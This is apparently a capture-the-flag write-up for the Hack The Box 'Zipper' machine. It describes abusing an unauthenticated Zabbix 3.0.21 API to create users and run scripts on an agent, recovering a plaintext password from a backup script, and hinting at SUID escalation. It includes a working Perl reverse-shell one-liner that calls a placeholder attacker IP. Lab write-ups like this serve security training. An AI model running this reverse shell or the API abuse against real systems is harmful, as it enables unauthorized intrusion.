HTB-靶机 Zipper-Writeup

Usually scan，nmap+dirb+gobuster+msftcp

find zabbix，ver3.0.21：

think about zabbix has jsrpc.php，any exploit？，json interface is not authorized to access，search it：

python has library named zabbixapi，https://github.com/lukecyca/pyzabbix
EXP. add host：http://blog.chinaunix.net/uid-28309325-id-5176638.html
createuser.py：

createscript.py：
The execute script must execute on zabbix agent not on server cuz server its a docker container

the panel of script before：

after excute the script：

editor the script，use the stable perl or python to backconnect：
perl-e'use Socket;$i="x.x.x.x";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'<br />
create events or triggers，filter use any，more hosts possible：

ncat to listen：

find the files of user zapper is permission denied,cat the backup.sh：
/usr/bin/7z a /backups/zapper_backup-$(/bin/date +%F).7z -pZippityDoDah /home/zapper/utils/* &>/dev/null
shell for backup，-p could be the pwd for zapper
zapper can not ssh：

use python to get a interactive shell：

so can use su，input the pwd，login successfully：

get user.txt
search folder：

The only one that runs with root is the service. Actually, the administrator may be negligent. This should be the way to leave a question for us
suid is running by root

download the pdf of writeup

文章来源：lsh4ck's Blog